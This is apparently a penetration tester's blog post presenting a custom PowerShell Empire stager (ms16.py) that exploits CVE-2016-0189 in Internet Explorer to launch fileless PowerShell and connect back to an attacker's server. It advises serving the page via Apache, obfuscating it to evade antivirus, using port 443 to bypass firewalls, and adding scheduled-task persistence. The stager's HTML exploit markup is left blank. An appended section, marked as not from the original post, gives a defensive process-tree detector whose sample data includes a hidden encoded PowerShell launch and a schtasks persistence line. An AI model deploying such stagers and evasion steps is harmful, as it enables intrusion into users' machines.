PowerShell Empire is one of our all-time favourite tools for engagements where targeting users is in scope. We generally use a combination of Metasploit and Empire to get the job done, pairing browser exploits with the standard stagers included with Empire.
On a recent test we did not have the option to use MSF, so instead we hacked together a new stager for Empire which leverages CVE-2016-0189 (also known as vbscript_godmode) to target users of Internet Explorer 9 to 11. This has been our go-to exploit for 6 or so months and has recently started appearing in exploit kits. If successful, PowerShell is launched and an agent connects back to Empire. Nothing is dropped on disk.
```python
from lib.common import helpers


class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'MS16-051 IE RCE',
            'Author': ['www.cgsec.co.uk'],
            'Description': ('Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which works on IE9/10/11 and all versions of Windows'),
            'Comments': [
                'Target will have to open link with vulnerable version of IE.'
            ]
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Listener' : {
                'Description' : 'Listener to generate stager for.',
                'Required' : True,
                'Value' : ''
            },
            'StagerRetries' : {
                'Description' : 'Times for the stager to retry connecting.',
                'Required' : False,
                'Value' : '0'
            },
            'OutFile' : {
                'Description' : 'File to output HTML to, otherwise displayed on the screen.',
                'Required' : True,
                'Value' : ''
            },
            'Base64' : {
                'Description' : 'Switch. Base64 encode the powershell output.',
                'Required' : True,
                'Value' : 'True'
            },
            'UserAgent' : {
                'Description' : 'User-agent string to use for the staging request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'Proxy' : {
                'Description' : 'Proxy to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'ProxyCreds' : {
                'Description' : 'Proxy credentials ([domain\\]username:password) to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # apply any options passed in at construction time
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):

        # extract all of our options
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        encode = False
        if base64.lower() == "true":
            encode = True

        # generate the launcher code via Empire's built-in launcher generator
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

        if launcher == "":
            print(helpers.color("[!] Error in launcher command generation."))
            return ""
        else:
            # the HTML page is assembled line by line; the markup that embedded
            # the launcher is not reproduced in the post
            code = "\n"
            code += "\n"
            code += "\n"
            code += "\n"
            code += "\n"
            code += " \n"
            code += " \n"
            code += " \n"
            code += "\n"
            code += ""

            return code
```
ms16.py
First we grab Empire, which is available on GitHub.
With Empire downloaded, we install apache2 so the stager can write the index page straight to /var/www/html. This step is optional, as most people will want to alter the output, obfuscating it to evade AV or similar.
Next we add the new stager (stagers live in /lib/stagers) and run Empire's install.sh script to get it up and running. If you are running Ubuntu, you will need to install pip manually before running this script.
Now we are ready to start Empire for the first time. If everything is well we should be able to run "usestager ms16", set our output file to /var/www/html/index.html and be ready to direct targets to it. More advanced users may want to set up something slightly more elaborate to serve different vectors to different clients or obfuscate the exploit; this is outside the scope of this article, however.
My personal preference is to set the listener to port 443 in the hope of bypassing certain firewalls and evading some detection mechanisms.
Now to generate our malicious HTML.
Now when your server is visited by somebody with a vulnerable browser, the exploit should trigger and you will be presented with a new agent in Empire. It is normally a good idea to use the persistence modules to create a scheduled task or similar to ensure you do not lose access on reboot. These can be set to run automatically as each new client connects by setting the agent to autorun.
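The chain described above leaves a recognisable process tree on the endpoint: Internet Explorer spawning powershell.exe (with an encoded command when Base64 is True), and that shell then creating a scheduled task if the persistence modules are used. As an added example that is not part of the original post or of Empire, the check below walks constructed process-creation records and flags exactly that pattern; the record fields and sample values are assumptions made up for the example.

```python
import re

# Constructed sample of process-creation events: (pid, ppid, image, cmdline).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "iexplore.exe",   "cmdline": "iexplore.exe http://example.test/"},
    {"pid": 210, "ppid": 200, "image": "iexplore.exe",   "cmdline": "iexplore.exe SCODEF:200 CREDAT:1"},
    {"pid": 300, "ppid": 210, "image": "powershell.exe",
     "cmdline": "powershell -NoP -sta -NonI -W Hidden -Enc AAAAAAAA"},   # constructed blob
    {"pid": 400, "ppid": 300, "image": "schtasks.exe",
     "cmdline": "schtasks /Create /SC ONLOGON /TN Updater /TR powershell"},
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},               # benign admin use
]

# -e, -en, -enc, -encodedcommand: the switch an encoded launcher is passed with
ENC_FLAG = re.compile(r"(?i)(^|\s)-(e|en|enc|encodedcommand)\s")


def find_browser_spawned_powershell(events):
    """Flag powershell.exe whose direct parent is iexplore.exe (what a successful
    stager produces), noting whether the command line was base64-encoded and
    whether that shell went on to create a scheduled task."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["image"].lower() != "iexplore.exe":
            continue
        tasks = [c for c in children.get(e["pid"], []) if c["image"].lower() == "schtasks.exe"]
        hits.append({
            "pid": e["pid"],
            "encoded": ENC_FLAG.search(e["cmdline"]) is not None,
            "scheduled_task": len(tasks) > 0,
        })
    return hits


if __name__ == "__main__":
    for hit in find_browser_spawned_powershell(SAMPLE_EVENTS):
        print("browser-spawned PowerShell pid=%(pid)d encoded=%(encoded)s "
              "scheduled_task=%(scheduled_task)s" % hit)
```

The benign PowerShell launched from explorer.exe (pid 500) is not reported, so the rule keys on the parent relationship rather than on PowerShell use alone.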
thanks